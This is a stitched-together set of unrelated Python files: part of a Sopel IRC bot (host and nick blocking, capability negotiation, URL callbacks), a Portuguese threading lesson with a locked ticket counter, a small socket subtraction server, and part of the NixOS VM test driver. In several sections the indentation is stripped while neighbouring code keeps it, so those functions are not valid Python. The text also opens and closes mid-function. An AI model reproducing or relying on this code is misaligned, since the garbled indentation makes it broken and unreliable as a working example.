            elif nick_blocked:
                block_type = 'nick'
            else:
                block_type = 'host'
            LOGGER.info(
                "[%s]%s prevented from using %s.",
                block_type,
                trigger.nick,
                ', '.join(list_of_blocked_functions)
            )
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
    def cap_req(self, module_name, capability, arg=None, failure_callback=None,
                success_callback=None):
        """Tell Sopel to request a capability when it starts.

        By prefixing the capability with `-`, it will be ensured that the
        capability is not enabled. Similarly, by prefixing the capability with
        `=`, it will be ensured that the capability is enabled. Requiring and
        disabling is "first come, first served"; if one module requires a
        capability, and another prohibits it, this function will raise an
        exception in whichever module loads second. An exception will also be
        raised if the module is being loaded after the bot has already started,
        and the request would change the set of enabled capabilities.

        If the capability is not prefixed, and no other module prohibits it, it
        will be requested. Otherwise, it will not be requested. Since
        capability requests that are not mandatory may be rejected by the
        server, as well as by other modules, a module which makes such a
        request should account for that possibility.

        The actual capability request to the server is handled after the
        completion of this function. In the event that the server denies a
        request, the `failure_callback` function will be called, if provided.
        The arguments will be a `Sopel` object, and the capability which was
        rejected. This can be used to disable callables which rely on the
        capability. It will be called either if the server NAKs the request,
        or if the server enabled it and later DELs it.

        The `success_callback` function will be called upon acknowledgement of
        the capability from the server, whether during the initial capability
        negotiation, or later.

        If ``arg`` is given, and does not exactly match what the server
        provides or what other modules have requested for that capability, it is
        considered a conflict.
        """
        # TODO raise better exceptions
        # Strip the assumed '-'/'=' prefix; for unprefixed capabilities `cap`
        # is restored to the full string in the else-branch below.
        cap = capability[1:]
        prefix = capability[0]

        entry = self._cap_reqs.get(cap, [])
        # All existing requests for this capability must agree on `arg`.
        if any((ent.arg != arg for ent in entry)):
            raise Exception('Capability conflict')

        if prefix == '-':
            if self.connection_registered and cap in self.enabled_capabilities:
                raise Exception('Can not change capabilities after server '
                                'connection has been completed.')
            # A prohibition conflicts with any non-prohibiting request.
            if any((ent.prefix != '-' for ent in entry)):
                raise Exception('Capability conflict')
            entry.append(_CapReq(prefix, module_name, failure_callback, arg,
                                 success_callback))
            self._cap_reqs[cap] = entry
        else:
            if prefix != '=':
                cap = capability
                prefix = ''
            if self.connection_registered and (cap not in
                                               self.enabled_capabilities):
                raise Exception('Can not change capabilities after server '
                                'connection has been completed.')
            # Non-mandatory will callback at the same time as if the server
            # rejected it.
            if any((ent.prefix == '-' for ent in entry)) and prefix == '=':
                raise Exception('Capability conflict')
            entry.append(_CapReq(prefix, module_name, failure_callback, arg,
                                 success_callback))
            self._cap_reqs[cap] = entry
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``
:param pattern: compiled regex pattern to register
:param callback: callable object to handle matching URLs
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if not bot.memory.contains('url_callbacks'):
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
"""
if not self.memory.contains('url_callbacks'):
self.memory['url_callbacks'] = tools.SopelMemory()
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.memory['url_callbacks'][pattern] = callback
def unregister_url_callback(self, pattern):
"""Unregister the callback for URLs matching the regex ``pattern``
:param pattern: compiled regex pattern to unregister callback
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex)
"""
if not self.memory.contains('url_callbacks'):
# nothing to unregister
return
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
try:
del self.memory['url_callbacks'][pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks found for ``url`` matching their regex pattern
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in tools.iteritems(self.memory['url_callbacks']):
match = regex.search(url)
if match:
yield function, match
|
main.py | from time import sleep
from threading import Thread
from threading import Lock
"""
class MeuThread(Thread):
def __init__(self, texto, tempo):
self.texto = texto
self.tempo = tempo
super().__init__()
def run(self):
sleep(self.tempo)
print(self.texto)
t1 = MeuThread('Thread 1', 5)
t1.start()
t2 = MeuThread('Thread 2', 3)
t2.start()
t3 = MeuThread('Thread 3', 2)
t3.start()
for i in range(20):
print(i)
sleep(1)
"""
"""
def vai_demorar(texto, tempo):
sleep(tempo)
print(texto)
t1 = Thread(target=vai_demorar, args=('Olá mundo 1!', 5))
t1.start()
t2 = Thread(target=vai_demorar, args=('Olá mundo 2!', 1))
t2.start()
t3 = Thread(target=vai_demorar, args=('Olá mundo 3!', 2))
t3.start()
for i in range(20):
print(i)
sleep(.5)
"""
"""
def vai_demorar(texto, tempo):
sleep(tempo)
print(texto)
t1 = Thread(target=vai_demorar, args=('Olá mundo 1!', 10))
t1.start()
t1.join()
print('Thread acabou!')
"""
"""
def vai_demorar(texto, tempo):
sleep(tempo)
print(texto)
t1 = Thread(target=vai_demorar, args=('ola mundo 1', 10))
t1.start()
# verifica se a thread ainda esta rodando
while t1.is_alive():
print('Esperando a thread...')
sleep(2)
print('Thread acabou!')
"""
class Ingressos:
    """Ticket vendor with a thread-safe purchase operation."""

    def __init__(self, estoque):
        """Initialize the vendor.

        :param estoque: number of tickets initially in stock
        """
        self.estoque = estoque
        # Guards all reads/writes of ``estoque`` during a purchase.
        self.lock = Lock()

    def comprar(self, quantidade):
        """Buy the given quantity of tickets, if enough stock remains.

        :param quantidade: how many tickets to buy
        :type quantidade: int
        :return: Nothing
        :rtype: None
        """
        # Using ``with`` guarantees the lock is released even if an exception
        # is raised mid-purchase; the original manual acquire()/release()
        # pair would leave the lock held forever in that case.
        with self.lock:
            if self.estoque < quantidade:
                print('Não temos ingressos suficientes.')
                return
            sleep(1)  # simulates slow order processing while the lock is held
            self.estoque -= quantidade
            print(f'Você comprou {quantidade} ingresso(s). '
                  f'Ainda temos {self.estoque} em estoque.')
if __name__ == '__main__':
    ingressos = Ingressos(10)
    # One buyer thread per purchase size 1..19.
    threads = [Thread(target=ingressos.comprar, args=(i,)) for i in range(1, 20)]
    for t in threads:
        t.start()
    # join() blocks until each thread finishes; the original busy-wait loop
    # (repeatedly polling is_alive()) burned CPU for no benefit.
    for t in threads:
        t.join()
    print(ingressos.estoque)
|
sub_server.py | import socket
import sys
import lib.ProtocolUtils as protocolUtils
import threading as thread
def message_handler(conn, addr):
    """Handle one client request: parse it, compute operand1 - operand2, and
    send the result (or an error message) back on the same connection.

    :param conn: connected socket to read the request from / reply on
    :param addr: client address tuple (unused; kept for the Thread signature)
    """
    data = protocolUtils.MessageHandler(conn.recv(1024)).message_loads()
    print("New operation in queue ", data[0], " ", data[2])
    try:
        result = str(float(data[0]) - float(data[2]))
    except ValueError:
        # Fixed the broken grammar of the client-facing error message
        # (was: "The operands requires be numbers").
        result = "The operands must be numbers"
    conn.send(result.encode())
    # The thread ends when this handler returns; no explicit sys.exit() needed.
if __name__ == "__main__":
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_instance.bind(('', 9992))
socket_instance.listen(10)
threads_list = []
print("Add Server running ...")
while True:
conn, addr = socket_instance.accept()
temp_thread = thread.Thread(target=message_handler, args=(conn, addr,))
threads_list.append(temp_thread)
temp_thread.start()
|
test-driver.py | #! /somewhere/python3
from contextlib import contextmanager, _GeneratorContextManager
from queue import Queue, Empty
from typing import Tuple, Any, Callable, Dict, Iterator, Optional, List, Iterable
from xml.sax.saxutils import XMLGenerator
from colorama import Style
from pathlib import Path
import queue
import io
import threading
import argparse
import base64
import codecs
import os
import ptpython.repl
import pty
import re
import shlex
import shutil
import socket
import subprocess
import sys
import tempfile
import time
import unicodedata
# Maps a literal character to the key name used when sending keystrokes to the
# VM (presumably QEMU `sendkey` names — TODO confirm): "0x.."-style entries are
# raw key codes and a "shift-" prefix adds the shift modifier, assuming a
# US keyboard layout.
CHAR_TO_KEY = {
    "A": "shift-a",
    "N": "shift-n",
    "-": "0x0C",
    "_": "shift-0x0C",
    "B": "shift-b",
    "O": "shift-o",
    "=": "0x0D",
    "+": "shift-0x0D",
    "C": "shift-c",
    "P": "shift-p",
    "[": "0x1A",
    "{": "shift-0x1A",
    "D": "shift-d",
    "Q": "shift-q",
    "]": "0x1B",
    "}": "shift-0x1B",
    "E": "shift-e",
    "R": "shift-r",
    ";": "0x27",
    ":": "shift-0x27",
    "F": "shift-f",
    "S": "shift-s",
    "'": "0x28",
    '"': "shift-0x28",
    "G": "shift-g",
    "T": "shift-t",
    "`": "0x29",
    "~": "shift-0x29",
    "H": "shift-h",
    "U": "shift-u",
    "\\": "0x2B",
    "|": "shift-0x2B",
    "I": "shift-i",
    "V": "shift-v",
    ",": "0x33",
    "<": "shift-0x33",
    "J": "shift-j",
    "W": "shift-w",
    ".": "0x34",
    ">": "shift-0x34",
    "K": "shift-k",
    "X": "shift-x",
    "/": "0x35",
    "?": "shift-0x35",
    "L": "shift-l",
    "Y": "shift-y",
    " ": "spc",
    "M": "shift-m",
    "Z": "shift-z",
    "\n": "ret",
    "!": "shift-0x02",
    "@": "shift-0x03",
    "#": "shift-0x04",
    "$": "shift-0x05",
    "%": "shift-0x06",
    "^": "shift-0x07",
    "&": "shift-0x08",
    "*": "shift-0x09",
    "(": "shift-0x0A",
    ")": "shift-0x0B",
}
class Logger:
    """Test-driver logger: writes human-readable lines to stderr and a
    structured XML log to the file named by $LOGFILE (default /dev/null).

    Serial-console output from VMs is queued (thread-safe) and drained into
    the XML log in order relative to regular log calls.
    """
    def __init__(self) -> None:
        self.logfile = os.environ.get("LOGFILE", "/dev/null")
        self.logfile_handle = codecs.open(self.logfile, "wb")
        self.xml = XMLGenerator(self.logfile_handle, encoding="utf-8")
        self.queue: "Queue[Dict[str, str]]" = Queue()

        self.xml.startDocument()
        self.xml.startElement("logfile", attrs={})

        self._print_serial_logs = True

    @staticmethod
    def _eprint(*args: object, **kwargs: Any) -> None:
        # Print to stderr so stdout stays available for other output.
        print(*args, file=sys.stderr, **kwargs)

    def close(self) -> None:
        """Finish the XML document and close the underlying logfile."""
        self.xml.endElement("logfile")
        self.xml.endDocument()
        self.logfile_handle.close()

    def sanitise(self, message: str) -> str:
        # Strip control characters (Unicode category "C*") that would corrupt
        # the XML output.
        return "".join(ch for ch in message if unicodedata.category(ch)[0] != "C")

    def maybe_prefix(self, message: str, attributes: Dict[str, str]) -> str:
        # Prefix "machine: " when the line is attributed to a particular VM.
        if "machine" in attributes:
            return "{}: {}".format(attributes["machine"], message)
        return message

    def log_line(self, message: str, attributes: Dict[str, str]) -> None:
        """Emit one <line> element into the XML log."""
        self.xml.startElement("line", attributes)
        self.xml.characters(message)
        self.xml.endElement("line")

    def info(self, *args, **kwargs) -> None:  # type: ignore
        self.log(*args, **kwargs)

    def warning(self, *args, **kwargs) -> None:  # type: ignore
        self.log(*args, **kwargs)

    def error(self, *args, **kwargs) -> None:  # type: ignore
        # Errors are fatal: log, then terminate the whole test driver.
        self.log(*args, **kwargs)
        sys.exit(1)

    def log(self, message: str, attributes: Dict[str, str] = {}) -> None:
        """Log *message* to stderr and the XML log, flushing queued serial
        output first so ordering is preserved.

        NOTE(review): the mutable default dict is safe here because
        ``attributes`` is only read, never mutated.
        """
        self._eprint(self.maybe_prefix(message, attributes))
        self.drain_log_queue()
        self.log_line(message, attributes)

    def log_serial(self, message: str, machine: str) -> None:
        """Queue a serial-console line from *machine*; optionally echo it
        (dimmed) to stderr."""
        self.enqueue({"msg": message, "machine": machine, "type": "serial"})
        if self._print_serial_logs:
            self._eprint(
                Style.DIM + "{} # {}".format(machine, message) + Style.RESET_ALL
            )

    def enqueue(self, item: Dict[str, str]) -> None:
        self.queue.put(item)

    def drain_log_queue(self) -> None:
        # Flush every queued serial-log entry into the XML log; Empty simply
        # means there is nothing pending.
        try:
            while True:
                item = self.queue.get_nowait()
                msg = self.sanitise(item["msg"])
                del item["msg"]
                self.log_line(msg, item)
        except Empty:
            pass

    @contextmanager
    def nested(self, message: str, attributes: Dict[str, str] = {}) -> Iterator[None]:
        """Context manager wrapping a unit of work in a <nest> XML element
        and logging its duration on exit."""
        self._eprint(self.maybe_prefix(message, attributes))

        self.xml.startElement("nest", attrs={})
        self.xml.startElement("head", attributes)
        self.xml.characters(message)
        self.xml.endElement("head")

        tic = time.time()
        self.drain_log_queue()
        yield
        self.drain_log_queue()
        toc = time.time()
        self.log("({:.2f} seconds)".format(toc - tic))

        self.xml.endElement("nest")
# Module-wide logger instance shared by the rest of the test driver.
rootlog = Logger()
def make_command(args: list) -> str:
    """Shell-quote each argument (after str() conversion) and join them with
    spaces into a single command line."""
    return " ".join(shlex.quote(str(arg)) for arg in args)
def retry(fn: Callable, timeout: int = 900) -> None:
    """Call the given function repeatedly, with 1 second intervals,
    until it returns True or a timeout is reached.

    ``fn`` receives one bool argument: False for the regular attempts and
    True for the single final attempt after the timeout, whose failure
    raises.
    """
    attempts = 0
    while attempts < timeout:
        if fn(False):
            return
        time.sleep(1)
        attempts += 1

    if not fn(True):
        raise Exception(f"action timed out after {timeout} seconds")
def _perform_ocr_on_screenshot(
    screenshot_path: str, model_ids: Iterable[int]
) -> List[str]:
    """Run tesseract OCR over *screenshot_path* once per OCR engine model in
    *model_ids*, returning the recognized text of each run.

    The image is first upscaled and cleaned up with ImageMagick's ``convert``
    to improve recognition quality.

    :raises Exception: if tesseract is not installed, or if the image
        conversion or any OCR invocation exits non-zero.
    """
    if shutil.which("tesseract") is None:
        raise Exception("OCR requested but enableOCR is false")

    magick_args = (
        "-filter Catrom -density 72 -resample 300 "
        + "-contrast -normalize -despeckle -type grayscale "
        + "-sharpen 1 -posterize 3 -negate -gamma 100 "
        + "-blur 1x65535"
    )

    # Was an f-string with no placeholders (lint F541); plain literal now.
    tess_args = "-c debug_file=/dev/null --psm 11"

    # NOTE(review): shell=True with interpolated paths would be injection-prone
    # if screenshot_path were attacker-controlled; here it is produced by the
    # test driver itself, so this is flagged rather than rewritten.
    cmd = f"convert {magick_args} {screenshot_path} tiff:{screenshot_path}.tiff"
    ret = subprocess.run(cmd, shell=True, capture_output=True)
    if ret.returncode != 0:
        raise Exception(f"TIFF conversion failed with exit code {ret.returncode}")

    model_results = []
    for model_id in model_ids:
        cmd = f"tesseract {screenshot_path}.tiff - {tess_args} --oem {model_id}"
        ret = subprocess.run(cmd, shell=True, capture_output=True)
        if ret.returncode != 0:
            raise Exception(f"OCR failed with exit code {ret.returncode}")
        model_results.append(ret.stdout.decode("utf-8"))

    return model_results
class StartCommand:
    """The Base Start Command knows how to append the necessary
    runtime qemu options as determined by a particular test driver
    run. Any such start command is expected to happily receive and
    append additional qemu args.  Subclasses supply ``_cmd``.
    """

    _cmd: str

    def cmd(
        self,
        monitor_socket_path: Path,
        shell_socket_path: Path,
        allow_reboot: bool = False,  # TODO: unused, legacy?
    ) -> str:
        # Run headless unless some display server is reachable.
        has_display = any(
            var in os.environ for var in ("DISPLAY", "WAYLAND_DISPLAY")
        )
        display_opts = "" if has_display else " -nographic"

        # qemu options
        if allow_reboot:
            qemu_opts = ""
        else:
            qemu_opts = (
                " -no-reboot"
                " -device virtio-serial"
                " -device virtconsole,chardev=shell"
                " -device virtio-rng-pci"
                " -serial stdio"
            )
        # TODO: qemu script already captures this env variable, legacy?
        qemu_opts += " " + os.environ.get("QEMU_OPTS", "")

        return (
            f"{self._cmd}"
            f" -monitor unix:{monitor_socket_path}"
            f" -chardev socket,id=shell,path={shell_socket_path}"
            f"{qemu_opts}"
            f"{display_opts}"
        )

    @staticmethod
    def build_environment(
        state_dir: Path,
        shared_dir: Path,
    ) -> dict:
        """Return a copy of the current environment extended with the state
        and shared-directory variables the VM scripts expect."""
        env = dict(os.environ)  # copy, so the caller's environment is untouched
        env["TMPDIR"] = str(state_dir)
        env["SHARED_DIR"] = str(shared_dir)
        env["USE_TMPDIR"] = "1"
        return env

    def run(
        self,
        state_dir: Path,
        shared_dir: Path,
        monitor_socket_path: Path,
        shell_socket_path: Path,
    ) -> subprocess.Popen:
        """Launch the VM process, with stderr merged into the stdout pipe."""
        return subprocess.Popen(
            self.cmd(monitor_socket_path, shell_socket_path),
            stdin=subprocess.DEVNULL,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            shell=True,
            cwd=state_dir,
            env=self.build_environment(state_dir, shared_dir),
        )
class NixStartScript(StartCommand):
    """A start script from nixos/modules/virtualisation/qemu-vm.nix
    that also satisfies the requirement of the BaseStartCommand.

    These Nix commands have the particular characteristic that the
    machine name can be extracted out of them via a regex match.
    (Admittedly a _very_ implicit contract, evtl. TODO fix)
    """

    def __init__(self, script: str):
        self._cmd = script

    @property
    def machine_name(self) -> str:
        """Derive the machine name from a trailing ``run-<name>-vm``;
        fall back to "machine" when the script path does not match."""
        match = re.search("run-(.+)-vm$", self._cmd)
        if match:
            return match.group(1)
        return "machine"
class LegacyStartCommand(StartCommand):
    """Used in some places to create an ad-hoc machine instead of
    using nix test instrumentation + module system for that purpose.
    Legacy.
    """

    def __init__(
        self,
        netBackendArgs: Optional[str] = None,
        netFrontendArgs: Optional[str] = None,
        hda: Optional[Tuple[Path, str]] = None,
        cdrom: Optional[str] = None,
        usb: Optional[str] = None,
        bios: Optional[str] = None,
        qemuFlags: Optional[str] = None,
    ):
        """Assemble the qemu-kvm command line from the given legacy knobs."""
        parts = ["qemu-kvm -m 384"]

        # networking: user-mode backend + virtio frontend, optionally extended
        backend = "-netdev user,id=net0"
        frontend = "-device virtio-net-pci,netdev=net0"
        if netBackendArgs is not None:
            backend = f"{backend},{netBackendArgs}"
        if netFrontendArgs is not None:
            frontend = f"{frontend},{netFrontendArgs}"
        parts.append(f" {backend} {frontend}")

        # primary disk (scsi needs an explicit frontend device)
        if hda is not None:
            disk_path = hda[0].resolve()
            disk_interface = hda[1]
            if disk_interface == "scsi":
                parts.append(
                    f" -drive id=hda,file={disk_path},werror=report,if=none"
                    " -device scsi-hd,drive=hda"
                )
            else:
                parts.append(
                    f" -drive file={disk_path},if={disk_interface},werror=report"
                )

        # cdrom
        if cdrom is not None:
            parts.append(f" -cdrom {cdrom}")

        # usb mass storage
        if usb is not None:
            # https://github.com/qemu/qemu/blob/master/docs/usb2.txt
            parts.append(
                " -device usb-ehci"
                f" -drive id=usbdisk,file={usb},if=none,readonly"
                " -device usb-storage,drive=usbdisk "
            )

        # bios
        if bios is not None:
            parts.append(f" -bios {bios}")

        # free-form extra qemu flags
        if qemuFlags is not None:
            parts.append(f" {qemuFlags}")

        self._cmd = "".join(parts)
class Machine:
    """A handle to the machine with this name, that also knows how to manage
    the machine lifecycle with the help of a start script / command."""

    name: str
    tmp_dir: Path              # base temp dir; shared_dir/state_dir live under it
    shared_dir: Path           # host<->guest shared folder ("shared-xchg")
    state_dir: Path            # per-VM state (sockets, disk state)
    monitor_path: Path         # unix socket path for the qemu monitor
    shell_path: Path           # unix socket path for the guest root shell
    start_command: StartCommand
    keep_vm_state: bool
    allow_reboot: bool
    process: Optional[subprocess.Popen]
    pid: Optional[int]
    monitor: Optional[socket.socket]
    shell: Optional[socket.socket]
    serial_thread: Optional[threading.Thread]
    booted: bool
    connected: bool
    # Store last serial console lines for use
    # of wait_for_console_text
    # NOTE(review): class-level Queue is shared by all instances until
    # start() rebinds a fresh one per instance -- confirm intended.
    last_lines: Queue = Queue()

    def __repr__(self) -> str:
        return f"<Machine '{self.name}'>"
    def __init__(
        self,
        tmp_dir: Path,
        start_command: StartCommand,
        name: str = "machine",
        keep_vm_state: bool = False,
        allow_reboot: bool = False,
    ) -> None:
        """Prepare per-VM directories and reset runtime state.

        The VM itself is only launched later by start()/connect().
        """
        self.tmp_dir = tmp_dir
        self.keep_vm_state = keep_vm_state
        self.allow_reboot = allow_reboot
        self.name = name
        self.start_command = start_command

        # set up directories ("shared-xchg" is common to all VMs of a run)
        self.shared_dir = self.tmp_dir / "shared-xchg"
        self.shared_dir.mkdir(mode=0o700, exist_ok=True)

        self.state_dir = self.tmp_dir / f"vm-state-{self.name}"
        self.monitor_path = self.state_dir / "monitor"
        self.shell_path = self.state_dir / "shell"
        # wipe stale state unless the caller asked to keep it
        if (not self.keep_vm_state) and self.state_dir.exists():
            self.cleanup_statedir()
        self.state_dir.mkdir(mode=0o700, exist_ok=True)

        self.process = None
        self.pid = None
        self.monitor = None
        self.shell = None
        self.serial_thread = None
        self.booted = False
        self.connected = False
    @staticmethod
    def create_startcommand(args: Dict[str, str]) -> StartCommand:
        """Build a LegacyStartCommand from a loose argument dict.

        Deprecated path; kept for backward compatibility.
        """
        # NOTE(review): the concatenated warning text is missing separating
        # spaces between the string fragments.
        rootlog.warning(
            "Using legacy create_startcommand(),"
            "please use proper nix test vm instrumentation, instead"
            "to generate the appropriate nixos test vm qemu startup script"
        )
        hda = None
        if args.get("hda"):
            hda_arg: str = args.get("hda", "")
            hda_arg_path: Path = Path(hda_arg)
            hda = (hda_arg_path, args.get("hdaInterface", ""))
        return LegacyStartCommand(
            netBackendArgs=args.get("netBackendArgs"),
            netFrontendArgs=args.get("netFrontendArgs"),
            hda=hda,
            cdrom=args.get("cdrom"),
            usb=args.get("usb"),
            bios=args.get("bios"),
            qemuFlags=args.get("qemuFlags"),
        )
    def is_up(self) -> bool:
        """True once the VM process runs and the root shell has answered."""
        return self.booted and self.connected

    def log(self, msg: str) -> None:
        # machine-scoped log line via the global test-driver logger
        rootlog.log(msg, {"machine": self.name})

    def log_serial(self, msg: str) -> None:
        # serial-console log line (can be muted via serial_stdout_off)
        rootlog.log_serial(msg, self.name)

    def nested(self, msg: str, attrs: Dict[str, str] = {}) -> _GeneratorContextManager:
        """Log context manager that tags entries with this machine's name.

        NOTE(review): the mutable default is safe only because attrs is
        never mutated (it is copied into my_attrs) -- keep it that way.
        """
        my_attrs = {"machine": self.name}
        my_attrs.update(attrs)
        return rootlog.nested(msg, my_attrs)
    def wait_for_monitor_prompt(self) -> str:
        """Read from the monitor socket until the "(qemu) " prompt appears
        (or the socket closes) and return everything received."""
        assert self.monitor is not None
        answer = ""
        while True:
            undecoded_answer = self.monitor.recv(1024)
            if not undecoded_answer:
                # socket closed -- return whatever we have
                break
            answer += undecoded_answer.decode()
            if answer.endswith("(qemu) "):
                break
        return answer

    def send_monitor_command(self, command: str) -> str:
        """Send one command line to the qemu monitor and return its reply."""
        message = ("{}\n".format(command)).encode()
        self.log("sending monitor command: {}".format(command))
        assert self.monitor is not None
        self.monitor.send(message)
        return self.wait_for_monitor_prompt()
    def wait_for_unit(self, unit: str, user: Optional[str] = None) -> None:
        """Wait for a systemd unit to get into "active" state.
        Throws exceptions on "failed" and "inactive" states as well as
        after timing out.
        """

        def check_active(_: Any) -> bool:
            info = self.get_unit_info(unit, user)
            state = info["ActiveState"]
            if state == "failed":
                raise Exception('unit "{}" reached state "{}"'.format(unit, state))
            if state == "inactive":
                # only give up if systemd has no queued jobs that could
                # still activate the unit
                status, jobs = self.systemctl("list-jobs --full 2>&1", user)
                if "No jobs" in jobs:
                    info = self.get_unit_info(unit, user)
                    if info["ActiveState"] == state:
                        raise Exception(
                            (
                                'unit "{}" is inactive and there ' "are no pending jobs"
                            ).format(unit)
                        )
            return state == "active"

        retry(check_active)

    def get_unit_info(self, unit: str, user: Optional[str] = None) -> Dict[str, str]:
        """Return the properties of `systemctl show <unit>` as a dict."""
        status, lines = self.systemctl('--no-pager show "{}"'.format(unit), user)
        if status != 0:
            raise Exception(
                'retrieving systemctl info for unit "{}" {} failed with exit code {}'.format(
                    unit, "" if user is None else 'under user "{}"'.format(user), status
                )
            )

        # systemctl show emits KEY=VALUE lines
        line_pattern = re.compile(r"^([^=]+)=(.*)$")

        def tuple_from_line(line: str) -> Tuple[str, str]:
            match = line_pattern.match(line)
            assert match is not None
            return match[1], match[2]

        return dict(
            tuple_from_line(line)
            for line in lines.split("\n")
            if line_pattern.match(line)
        )

    def systemctl(self, q: str, user: Optional[str] = None) -> Tuple[int, str]:
        """Run systemctl in the guest; with `user` set, run it inside that
        user's session (via su -l and XDG_RUNTIME_DIR)."""
        if user is not None:
            q = q.replace("'", "\\'")
            return self.execute(
                (
                    "su -l {} --shell /bin/sh -c "
                    "$'XDG_RUNTIME_DIR=/run/user/`id -u` "
                    "systemctl --user {}'"
                ).format(user, q)
            )
        return self.execute("systemctl {}".format(q))
    def require_unit_state(self, unit: str, require_state: str = "active") -> None:
        """Assert that a unit currently is in `require_state` (no waiting)."""
        with self.nested(
            "checking if unit ‘{}’ has reached state '{}'".format(unit, require_state)
        ):
            info = self.get_unit_info(unit)
            state = info["ActiveState"]
            if state != require_state:
                raise Exception(
                    "Expected unit ‘{}’ to to be in state ".format(unit)
                    + "'{}' but it is in state ‘{}’".format(require_state, state)
                )

    def _next_newline_closed_block_from_shell(self) -> str:
        """Read from the shell socket until a chunk ends in a newline (or
        the socket closes) and return the accumulated text.

        NOTE(review): assumes recv() chunks split on UTF-8 boundaries; a
        multi-byte character split across chunks would make decode() raise.
        """
        assert self.shell
        output_buffer = []
        while True:
            # This receives up to 4096 bytes from the socket
            chunk = self.shell.recv(4096)
            if not chunk:
                # Probably a broken pipe, return the output we have
                break

            decoded = chunk.decode()
            output_buffer += [decoded]
            if decoded[-1] == "\n":
                break
        return "".join(output_buffer)
    def execute(self, command: str, check_return: bool = True) -> Tuple[int, str]:
        """Run a shell command in the guest and return (exit code, output).

        The output is base64-armored over the shell socket so arbitrary
        bytes survive the transport; with check_return=False the reported
        exit code is always -1.
        """
        self.connect()

        # set -euo pipefail so the reported PIPESTATUS reflects failures
        out_command = f"( set -euo pipefail; {command} ) | (base64 --wrap 0; echo)\n"
        assert self.shell
        self.shell.send(out_command.encode())

        # Get the output
        output = base64.b64decode(self._next_newline_closed_block_from_shell())

        if not check_return:
            return (-1, output.decode())

        # Get the return code
        self.shell.send("echo ${PIPESTATUS[0]}\n".encode())
        rc = int(self._next_newline_closed_block_from_shell().strip())

        return (rc, output.decode())

    def shell_interact(self) -> None:
        """Allows you to interact with the guest shell
        Should only be used during test development, not in the production test."""
        self.connect()
        self.log("Terminal is ready (there is no prompt):")
        assert self.shell
        # hand the shell socket fd to socat for a line-edited terminal
        subprocess.run(
            ["socat", "READLINE", f"FD:{self.shell.fileno()}"],
            pass_fds=[self.shell.fileno()],
        )
    def succeed(self, *commands: str) -> str:
        """Execute each command and check that it succeeds.

        Returns the concatenated output of all commands.
        """
        output = ""
        for command in commands:
            with self.nested("must succeed: {}".format(command)):
                (status, out) = self.execute(command)
                if status != 0:
                    self.log("output: {}".format(out))
                    raise Exception(
                        "command `{}` failed (exit code {})".format(command, status)
                    )
                output += out
        return output

    def fail(self, *commands: str) -> str:
        """Execute each command and check that it fails.

        Returns the concatenated output of all commands.
        """
        output = ""
        for command in commands:
            with self.nested("must fail: {}".format(command)):
                (status, out) = self.execute(command)
                if status == 0:
                    raise Exception(
                        "command `{}` unexpectedly succeeded".format(command)
                    )
                output += out
        return output

    def wait_until_succeeds(self, command: str, timeout: int = 900) -> str:
        """Wait until a command returns success and return its output.
        Throws an exception on timeout.
        """
        output = ""

        def check_success(_: Any) -> bool:
            nonlocal output
            status, output = self.execute(command)
            return status == 0

        with self.nested("waiting for success: {}".format(command)):
            retry(check_success, timeout)
        return output

    def wait_until_fails(self, command: str) -> str:
        """Wait until a command returns failure.
        Throws an exception on timeout.
        """
        output = ""

        def check_failure(_: Any) -> bool:
            nonlocal output
            status, output = self.execute(command)
            return status != 0

        with self.nested("waiting for failure: {}".format(command)):
            retry(check_failure)
        return output
    def wait_for_shutdown(self) -> None:
        """Block until the qemu process exits; no-op when not booted."""
        if not self.booted:
            return

        with self.nested("waiting for the VM to power off"):
            sys.stdout.flush()
            assert self.process
            self.process.wait()

            self.pid = None
            self.booted = False
            self.connected = False

    def get_tty_text(self, tty: str) -> str:
        """Return the visible contents of /dev/vcs<tty>, wrapped to the
        terminal's current width."""
        status, output = self.execute(
            "fold -w$(stty -F /dev/tty{0} size | "
            "awk '{{print $2}}') /dev/vcs{0}".format(tty)
        )
        return output

    def wait_until_tty_matches(self, tty: str, regexp: str) -> None:
        """Wait until the visible output on the chosen TTY matches regular
        expression. Throws an exception on timeout.
        """
        matcher = re.compile(regexp)

        def tty_matches(last: bool) -> bool:
